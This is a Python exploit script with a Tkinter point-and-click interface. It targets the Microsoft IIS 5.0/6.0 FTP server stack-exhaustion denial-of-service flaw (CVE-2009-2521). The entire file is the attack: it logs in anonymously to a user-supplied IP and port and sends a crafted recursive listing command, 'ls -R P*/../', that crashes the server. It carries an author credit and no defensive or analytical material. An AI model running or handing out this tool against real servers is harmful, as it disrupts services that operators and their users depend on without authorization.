#!/usr/bin/python
# Exploit Title: Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [GUI VERSION]
# Exploit Author: D35m0nd142
# Date: 03/10/2012
# Vendor Homepage: http://www.iis.net/
# Tested on Ubuntu 12.04
# CVE: 2009-2521
# Special thanks to Kingcope
from socket import *
import sys
import Tkinter
import time
def exploit():
sock=socket(AF_INET,SOCK_STREAM)
ip1=ip.get()
port1=port.get()
username="ftp"
passwd="[email protected]"
sock.connect((ip1,port1))
sock.send("user %s\r\n" %username)
print "[+]" + sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
print "[+]" + sock.recv(1024)
command="ls -R P*/../"
sock.send("%s\r\n" %command)
print sock.recv(1024)
sock.close()
time.sleep(2)
exploited=Tkinter.Label(text="[+] Exploit sent [+]",bg="blue",fg="green").pack()
root=Tkinter.Tk()
root.title("* Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service *")
root['bg']="black"
ip_text=Tkinter.Label(text="IP Address :").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
port_text=Tkinter.Label(text="Port :").pack()
port=Tkinter.IntVar()
port_entry=Tkinter.Entry(textvariable=port).pack()
exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
author=Tkinter.Label(text="Author: D35m0nd142 | https://twitter.com/D35m0nd142").pack(side='bottom')
root.mainloop()
